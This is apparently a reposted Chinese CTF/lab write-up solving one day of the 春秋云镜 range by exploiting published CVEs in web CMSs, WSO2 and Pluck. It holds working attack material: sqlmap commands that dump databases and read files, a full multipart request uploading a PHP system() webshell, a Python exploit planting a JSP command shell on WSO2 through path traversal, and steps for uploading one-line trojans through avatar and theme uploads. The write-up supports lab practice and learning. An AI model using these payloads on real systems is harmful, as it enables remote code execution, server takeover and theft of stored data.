春秋云镜wp day1
今天看到之前买了内网渗透那本书,今天看到靶场上线了,打一天玩一下,总体cve的洞很好刷,比打CTF轻松多了。
CVE-2022-32991
首先登陆,点击第二个start,抓包并保存到一个txt
1
python sqlmap.py -r 1.txt --dbs --random-agent -p eid
获取flag
1
python sqlmap.py -r 1.txt -D ctf -T flag -C flag --dump --random-agent -p eid
Web Based Quiz System v1.0 is vulnerable to SQL Injection via welcome.php · 语雀 (yuque.com)
CVE-2022-30887
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
poc
HTTP
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33
POST /php_action/editProductImage.php?id=1 HTTP/1.1 Host : eci-2zegbcou4c05rxuhfujv.cloudeci1.ichunqiu.comUser-Agent : Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language : en-US,en;q=0.5Accept-Encoding : gzip, deflateContent-Type : multipart/form-data; boundary=---------------------------208935235035266125502673738631Content-Length : 556Connection : closeCookie : PHPSESSID=t1jo541l52f76t9upiu0pbqv0cUpgrade-Insecure-Requests : 1-----------------------------208935235035266125502673738631 Content-Disposition: form-data; name="old_image" -----------------------------208935235035266125502673738631 Content-Disposition: form-data; name="productImage" ; filename="shell.php" Content-Type: image/jpeg <?php if ($_REQUEST ['s' ]) { system($_REQUEST ['s' ]); } else phpinfo(); ?> </pre> </body> </html> -----------------------------208935235035266125502673738631 Content-Disposition: form-data; name="btn" -----------------------------208935235035266125502673738631 --
访问/assets/myimages/shell.php
CVE-2022-28525
ED01-CMS v20180505 存在任意文件上传漏洞
admin admin登陆,直接在头像上传处上传webshell
访问/images/shell.php
CVE-2022-29464
WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。
PLAINTEXT
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
import requests, urllib3, sys urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) if len(sys.argv) != 3: print(f"Usage: python3 {sys.argv[0]} https://host shell.jsp") exit() host, file = sys.argv[1:] shell = """<FORM> <INPUT name='cmd' type=text> <INPUT type=submit value='Run'> </FORM> <%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd,null,null); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s+"</br>"; } } catch(IOException e) { e.printStackTrace(); } } %> <pre><%=output %></pre>""" files = {f"../../../../repository/deployment/server/webapps/authenticationendpoint/{file}": shell} response = requests.post(f'{host}/fileupload/toolsAny', files=files, verify=False) print(f"shell @ {host}/authenticationendpoint/{file}")
CVE-2022-29464/exploit.py at main · hakivvi/CVE-2022-29464 (github.com)
访问,获取flag
CVE-2022-28512
Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。
[MISC:https://github.com/JiuBanSec/CVE/blob/main/Fantastic%20Blog%20CMS/SQL1.md](https://github.com/JiuBanSec/CVE/blob/main/Fantastic Blog CMS/SQL1.md)
MISC:https://www.sourcecodester.com/php/12258/fantastic-blog-cms-php.html
找到细节,直接放进sqlmap跑出flag
PLAINTEXT
1
python sqlmap.py -u http://eci-2zeg7t9zem78xthlwwim.cloudeci1.ichunqiu.com/single.php?id=1 --dbs
1
python sqlmap.py -u http://eci-2zeg7t9zem78xthlwwim.cloudeci1.ichunqiu.com/single.php?id=1 -D ctf -T flag -C flag --dump
CVE-2022-28060
Victor CMS v1.0 /includes/login.php 存在sql注入
库名
1 2 3 4 5 6
available databases [5]: [*] information_schema [*] mysql [*] performance_schema [*] php_cms [*] sys
表名php_cms
1 2 3 4 5 6 7 8
Database: php_cms [4 tables] +------------+ | categories | | comments | | posts | | users | +------------+
users列名
1 2 3 4 5 6 7 8 9 10
+----------------+--------------+ | Column | Type | +----------------+--------------+ | user_email | varchar(255) | | user_firstname | varchar(255) | | user_id | int(3) | | user_lastname | varchar(255) | | user_name | varchar(255) | | user_password | varchar(255) | +----------------+--------------+
post
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
[10 columns] +--------------------+--------------+ | Column | Type | +--------------------+--------------+ | post_author | varchar(255) | | post_category_id | int(3) | | post_comment_count | varchar(255) | | post_content | text | | post_date | date | | post_id | int(3) | | post_image | text | | post_status | varchar(255) | | post_tags | varchar(300) | | post_title | varchar(255) | +--------------------+--------------+
PLAINTEXT
1 2 3 4 5 6 7 8 9
Database: php_cms Table: categories [2 columns] +-----------+--------------+ | Column | Type | +-----------+--------------+ | cat_id | int(11) | | cat_title | varchar(255) | +-----------+--------------+
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
Database: php_cms Table: comments [7 columns] +-----------------+--------------+ | Column | Type | +-----------------+--------------+ | comment_author | varchar(255) | | comment_content | text | | comment_date | date | | comment_email | varchar(255) | | comment_id | int(3) | | comment_post_id | int(3) | | comment_status | varchar(255) | +-----------------+--------------+
感觉思路不对,试试读文件
1
python3 sqlmap.py -r 1.txt --file-read "/flag" --dbms Mysql
CVE-2022-26201
Victor CMS v1.0 存在二次注入漏洞
sql注入的题目能用sqlmap梭哈就不动手了
找到注入点
CVE-2022-26965
Pluck-CMS-Pluck-4.7.16 后台RCE
admin admin登陆
添加themes
1
https://github.com/pluck-cms/themes
下载下来后,为了防止有什么不一样直接用网上公开的,选择bestfriends
在info.php里面写入一句话木马
上传bestfirends之后访问
访问/data/themes/bestfriends/info.php
成功执行
CVE-2022-25488
Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面
网上搜到注入点/admin/ajax/avatar.php?id=1
直接sqlmap梭哈
原文始发于微信公众号(SkyMirror 穹镜):春秋云镜wp day1
评论